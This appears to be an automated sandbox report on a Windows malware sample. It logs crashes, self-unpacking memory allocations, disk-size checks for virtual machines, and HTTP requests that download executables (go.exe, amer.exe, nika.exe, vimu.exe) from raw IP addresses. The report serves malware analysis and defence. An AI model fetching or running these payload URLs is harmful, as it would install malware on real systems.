__exception__ Jan. 19, 2024, 7:57 a.m.	stacktrace: ttpwyoz21cqhkgjwqzz9+0x30ba38 @ 0xb8ba38 ttpwyoz21cqhkgjwqzz9+0x31caa6 @ 0xb9caa6 ttpwyoz21cqhkgjwqzz9+0x405496 @ 0xc85496 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ttpwyoz21cqhkgjwqzz9+0x2645d0 exception.instruction: ud2 exception.module: TTPWYoz21cqHkGJWQZz9.exe exception.exception_code: 0xc000001d exception.offset: 2508240 exception.address: 0xae45d0 registers.esp: 6224852 registers.edi: 13132016 registers.eax: 0 registers.ebp: 6224880 registers.edx: 2 registers.ebx: 1241865033 registers.esi: 10489856 registers.ecx: 41236680	1
__exception__ Jan. 19, 2024, 7:57 a.m.	stacktrace: ttpwyoz21cqhkgjwqzz9+0x30ba38 @ 0xb8ba38 ttpwyoz21cqhkgjwqzz9+0x31caa6 @ 0xb9caa6 ttpwyoz21cqhkgjwqzz9+0x405496 @ 0xc85496 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ttpwyoz21cqhkgjwqzz9+0x2645a5 exception.instruction: div eax exception.module: TTPWYoz21cqHkGJWQZz9.exe exception.exception_code: 0xc0000094 exception.offset: 2508197 exception.address: 0xae45a5 registers.esp: 6224852 registers.edi: 6224852 registers.eax: 0 registers.ebp: 6224880 registers.edx: 0 registers.ebx: 11421158 registers.esi: 0 registers.ecx: 6224888	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/go.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/go.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.68/mine/amer.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.68/mine/amer.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/nika.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/nika.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/vimu.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/vimu.exe

Performs some HTTP requests (19 events)

request	HEAD http://109.107.182.3/cost/go.exe
request	GET http://109.107.182.3/cost/go.exe
request	HEAD http://185.215.113.68/mine/amer.exe
request	GET http://185.215.113.68/mine/amer.exe
request	HEAD http://109.107.182.3/cost/nika.exe
request	GET http://109.107.182.3/cost/nika.exe
request	HEAD http://109.107.182.3/cost/vimu.exe
request	GET http://109.107.182.3/cost/vimu.exe
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ASKXGp1e75G1gW0DiCO0dOvUf1sNyw_eYkTsegr2M0TGYOboAyXMt2zZ3wpHZodY7fybxG3b4LbZ2w
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp0MrYoqgbP9QAW3euB1trnjW3nzVsSX4zXyxia8fKwg7xPv0o6RkXvohF4lTm5X6bsfBNbeyg&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-939002500%3A1705618756630130
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/_/bscframe
request	GET https://accounts.google.com/favicon.ico
request	GET https://accounts.google.com/generate_204?biSL3A
request	GET https://www.google.com/favicon.ico

Allocates read-write-execute memory (usually to unpack itself) (50 out of 568 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 516 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ff1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fa1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ed1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73541000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73df1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73501000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02d70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 region_size: 6361088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03280000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73343000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x733e7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76af9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ac2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75602000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2836 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x030b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:57 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74951000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2912 region_size: 7540736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02eb0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x035e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (19 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 19, 2024, 7:56 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2836 crashed
__exception__ Jan. 19, 2024, 7:57 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 106426500 registers.edi: 77971076 registers.eax: 106426500 registers.ebp: 106426580 registers.edx: 312 registers.ebx: 106426864 registers.esi: 2147746133 registers.ecx: 78256792	1	0	0
__exception__ Jan. 19, 2024, 7:57 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x727e540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x727e52ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x728c0ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 